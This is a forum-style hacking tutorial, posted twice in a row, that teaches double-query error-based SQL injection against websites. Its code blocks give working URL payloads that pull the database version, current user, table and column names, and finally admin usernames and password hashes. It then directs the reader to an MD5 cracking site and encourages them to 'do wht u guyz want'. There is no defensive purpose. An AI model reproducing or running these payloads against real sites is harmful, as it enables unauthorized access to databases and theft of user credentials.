Sql injection [Double Query Error Based]
Asalam O Alaikum
This tutorial is about how to hack a website through Sql injection Double Query Error Based
So for this first you need a vulnerable site..
ok after getting a vulnerable site as a normal you get the column counts
suppose it has 4 columns so next your command will be
but when you press enter it gives error :-0
the error is
so now what?????
don't be so confused its time for using double query Sql injection
so your command will look like this:-
and result will look like this
so here '5.0.92-community-log1' is sites version.
now we have to find sites current_user so our command will be:-
result
ok now we will find tables by this command :-
result should be
now keep increasing the limit you can find it near
here change the limit '0,1'to 1,1 then 2,1 until you get the error.
ok now we will find tables which contains the data so our command will be:-
result
so here again increase the limits value until you get the table like user,,admin,,login etc etc..
ok now suppose we have table name "user" so next step is to find columns of this table our command will be:-
result
you can change text to hex here>> http://www.swingnote.com/tools/texttohex.php
again keep changing limits value untill you get columns like username,password etc :/
ok now we have columns username and password we need the data inside the columns so our command will be:-
result
if the password is in hashes then you have to crack that hash
u can crack that hash with a site namely
so u can crack the hash
so u got user and pass login do wht u guyz want nd enjoy
POSTED BY HASAN AFAQUE (Admin)
Asalam O Alaikum
This tutorial is about how to hack a website through Sql injection Double Query Error Based
So for this first you need a vulnerable site..
ok after getting a vulnerable site as a normal you get the column counts
suppose it has 4 columns so next your command will be
Code:
www.vulnsite.com/index.php?id=-12 union select 1,2,3,4--
the error is
Code:
(select statement have different numbers of column)
so now what?????
don't be so confused its time for using double query Sql injection
so your command will look like this:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
and result will look like this
Code:
"Duplicate entry '5.0.92-community-log1' for key 1"
so here '5.0.92-community-log1' is sites version.
now we have to find sites current_user so our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(current_user())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry user+1' for key 1"
ok now we will find tables by this command :-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result should be
Code:
"duplicate entry 'table_name1' for key 1'
now keep increasing the limit you can find it near
Code:
((table_name)+from+information_schema.tables+limit+0,1) )
ok now we will find tables which contains the data so our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"duplicate entry tablename1' for key 1"
so here again increase the limits value until you get the table like user,,admin,,login etc etc..
ok now suppose we have table name "user" so next step is to find columns of this table our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(column_name)+from+information_schema.columns+where+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry 'column name1' for key 1'
you can change text to hex here>> http://www.swingnote.com/tools/texttohex.php
again keep changing limits value untill you get columns like username,password etc :/
ok now we have columns username and password we need the data inside the columns so our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(username,0x3a,password)+from+user+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry 'Admin:452875204827e1f25994a3da414587125' for key 1"
u can crack that hash with a site namely
Code:
http://md5decrypter.co.uk
so u got user and pass login do wht u guyz want nd enjoy
POSTED BY HASAN AFAQUE (Admin)
Tags
Website Hacking